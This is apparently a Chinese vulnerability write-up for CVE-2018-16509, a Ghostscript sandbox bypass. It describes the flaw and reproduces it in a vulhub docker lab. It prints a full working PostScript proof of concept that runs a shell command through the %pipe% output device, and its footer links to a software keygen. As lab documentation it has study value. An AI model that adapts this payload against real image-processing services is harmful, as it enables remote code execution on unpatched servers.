（CVE-2018-16509）GhostScript_沙箱绕过（命令执行）漏洞-棉花糖会员站

# （CVE-2018-16509）GhostScript 沙箱绕过（命令执行）漏洞

==============

一、漏洞简介
————

该漏洞源于在处理/invalidaccess异常时，程序没有正确的检测’restoration of
privilege（权限恢复）’。攻击者可通过提交特制的PostScript利用该漏洞执行代码。

二、漏洞影响
————

Ghostscript 9.24之前版本

三、复现过程
————

上传poc.png，将执行命令`id > /tmp/success && cat /tmp/success`。此时进入容器`docker-compose exec web bash`，将可以看到/tmp/success已被创建：

**poc.png**

%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%id > /tmp/success && cat /tmp/success) currentdevice putdeviceprops

![](/static/qingy/（CVE-2018-16509）GhostScript_沙箱绕过（命令执行）漏洞/img/rId24.png)

参考链接
——–

> https://vulhub.org/\#/environments/ghostscript/CVE-2018-16509/

文章版权归作者所有，未经允许请勿转载。

THE END

国内漏洞库

（CVE-2018-16509）GhostScript_沙箱绕过（命令执行）漏洞

请登录后发表评论

1独家!超强代码审计工具上线！免费会员等你来嫖！

2有poc有语法，如何一分钟完成复现/批量检测

3Windows应急响应

4UltraEdit、UEStudio、UltraCompare 注册机

5Nacos Derby 远程命令执行(QVD-2024-26473)

6索贝融媒体search SQL注入